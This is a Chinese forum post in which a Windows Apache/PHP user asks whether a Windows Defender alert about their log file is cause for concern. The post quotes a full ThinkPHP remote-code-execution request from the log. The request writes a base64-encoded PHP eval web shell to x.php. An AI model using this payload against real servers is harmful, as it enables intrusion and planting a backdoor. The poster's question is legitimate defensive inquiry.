我在 Windows 10 PC 上运行 Apache 2.4.51 和 PHP 8.1.0。最近,我注意到我的日志中有一些条目和来自 Windows Defender 的相应警报。导致 AV 警报的一个示例罪魁祸首是,https://jacobsm.com/?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27fuck%27]);&fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz54YnNoZWxs));
它在响应中给出 200 代码,并且来自 Windows Defender 的警报Backdoor:PHP/Remoteshell.B
。Defender 还指出状态为失败,并且可能尚未完全修复。受影响的文件是 Apache 日志文件,因此无法隔离它,因为它正在被 Apache 使用。我怀疑它担心该文件可能会被 PHP 处理器解释(尽管永远不会)。我应该担心吗?